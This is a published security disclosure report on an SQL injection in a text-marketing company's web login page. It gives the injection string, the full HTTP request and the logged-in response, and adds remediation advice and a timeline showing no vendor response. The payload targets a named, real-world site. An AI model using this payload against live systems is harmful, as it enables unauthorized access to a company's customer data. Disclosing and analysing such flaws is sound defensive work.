This report was fully disclosed on 19 August 2020
Due to the lack of input santization it is possible to perform an SQL injection against various end-points on the web application. Using a common SQL injection technique it was possible to bypass authentication and login as an administrative user.
About Text Logistics: “Text Logistics provides easy to use tools to help you connect with your customers and promote retention while gaining valuable insight and information. We provide text marketing, appointment reminders, click-to-call service and instant group text alerts.”
Proof of Concept
For a proof of concept we will target the
/clients/signin.asp end-point. It was noted that the following end-point was also vulnerable
To exploit this vulnerability we can simply input
-1' OR 1=1 into the username field and click submit.
The subsequent request will look like the following
POST /clients/signin.asp HTTP/1.1 Host: www.textlogistics.com Connection: close Content-Length: 33 Content-Type: application/x-www-form-urlencoded User-Agent: Hacker 7.23 email=-1%27+OR+1%3D1%16&password=
we should receive the following response, indicating we have successfully logged in.
HTTP/1.1 302 Object moved Cache-Control: private Content-Type: text/html Location: welcome.asp Server: Microsoft-IIS/8.5 Set-Cookie: memberID=1517; path=/ Set-Cookie: [REDACTED]; path=/ Set-Cookie: [REDACTED]; secure; path=/ X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Wed, 26 Feb 2020 03:30:33 GMT Connection: close Content-Length: 132 <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="welcome.asp">here</a>.</body>
It is important to note that while this proof of concept only demonstrates an authentication bypass, it would be possible for an attacker to download the entire application database, make modifications, and even perform remote command execution.
- Implement proper input santization to prevent SQLi and other injection attacks.
- Inspect logs to determine if unauthorized access to the database has occurred.
- Implement security and bug reporting information such as a security.txt file so security researchers can more easily report findings in the future.
- Perform a full penetration test of the web platform and API to identify further issues.
Response From Affected Party
At the time of publishing no response has been received.
- 26 February 2020: Affected Party Notified
- 19 August 2020: Report Published (+175 days)